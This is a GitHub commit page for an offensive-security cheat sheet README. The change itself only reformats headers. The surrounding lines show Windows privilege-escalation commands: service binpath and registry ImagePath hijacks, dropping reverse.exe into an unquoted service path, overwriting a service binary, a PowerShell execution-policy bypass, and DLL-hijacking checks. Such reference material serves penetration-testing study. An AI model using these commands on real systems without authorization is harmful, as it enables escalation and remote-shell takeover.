kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-03 09:37:08 -04:00
committed by GitHub
parent 3ff5e826c9
commit b1cf4a69c2
1 changed files with 16 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

32
README.md
View File

@@ -665,7 +665,7 @@ python3 exploit.py
[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) [Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
```bash ```ps1
# Find information about system # Find information about system
systeminfo systeminfo
@@ -683,9 +683,9 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
.\winPEASany.exe quiet servicesinfo .\winPEASany.exe quiet servicesinfo
#####################################
# 1. Insecure Service Properties # 1. Insecure Service Properties ####
#####################################
# Verify permissions of a service using accesschk # Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE} .\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -702,8 +702,9 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
# Start a service: # Start a service:
net start {SERVICE} net start {SERVICE}
###############################
# 2. Unquoted Service Path # 2. Unquoted Service Path ####
###############################
# Verify permissions of to start service using accesschk # Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE} .\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -718,8 +719,9 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo
net start {SERVICE} net start {SERVICE}
###################################
# 3. Weak Registry Permissions # 3. Weak Registry Permissions ####
###################################
# Check regsvc for weak entries using powershell # Check regsvc for weak entries using powershell
powershell -exec bypass powershell -exec bypass
@@ -741,11 +743,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND
# Start the service: # Start the service:
net start regsvc net start regsvc
###################################################################
# 4. Insecure Service Executables (File Permissions: Everyone) ####
###################################################################
# 4. Insecure Service Executables (File Permissions: Everyone)
# Verify permissions of a service using accesschk # Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" .\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
@@ -759,9 +759,9 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepe
# Start the service # Start the service
net start filepermsvc net start filepermsvc
#######################
# 5. DLL Hijacking # 5. DLL Hijacking ####
#######################
# Verify permissions of to start service using accesschk # Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uvqc dllsvc .\accesschk.exe /accepteula -uvqc dllsvc